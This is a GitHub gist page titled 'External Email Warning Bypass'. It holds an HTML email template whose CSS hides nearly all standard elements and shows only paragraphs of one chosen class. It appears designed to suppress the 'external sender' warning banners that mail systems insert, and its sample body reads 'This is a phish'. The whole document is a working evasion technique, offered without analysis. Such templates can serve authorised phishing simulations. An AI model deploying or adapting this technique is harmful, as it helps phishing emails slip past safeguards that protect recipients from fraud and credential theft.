-
-
Save Xenov-X/e4cc7dba7fae1d68c62b3856d68ffcf8 to your computer and use it in GitHub Desktop.
External Email Warning Bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title></title> | |
| <style type="text/css"> | |
| body { | |
| display: none !important; | |
| background:#FFFFFF !important; | |
| } | |
| .id3 { | |
| display: block !important; | |
| } | |
| div[style] { | |
| display: none !important; | |
| background:#FFFFFF !important; | |
| } | |
| p { | |
| display: none !important; | |
| background:#FFFFFF !important; | |
| } | |
| p[style] { | |
| display: none !important; | |
| background:#FFFFFF !important; | |
| } | |
| span { | |
| display: none !important; | |
| background: #FFFFFF !important; | |
| } | |
| span[style] { | |
| display: none !important; | |
| background:#FFFFFF !important; | |
| } | |
| table[style] { | |
| display: none !important; | |
| background:#FFFFFF !important; | |
| } | |
| table { | |
| display: none !important; | |
| background:#FFFFFF !important; | |
| } | |
| td { | |
| display: none !important; | |
| background:#FFFFFF !important; | |
| } | |
| td[style] { | |
| display: none !important; | |
| background:#FFFFFF !important; | |
| } | |
| tr { | |
| display: none !important; | |
| background:#FFFFFF !important; | |
| } | |
| tr[style] { | |
| display: none !important; | |
| background:#FFFFFF !important; | |
| } | |
| tbody { | |
| background:#FFFFFF !important; | |
| display: none !important; | |
| } | |
| tbody[style] { | |
| display: none !important; | |
| background:#FFFFFF !important; | |
| } | |
| </style> | |
| </head> | |
| <body> | |
| <p class="id3">Dear Name,</p> | |
| <p class="id3">This is a phish</p> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment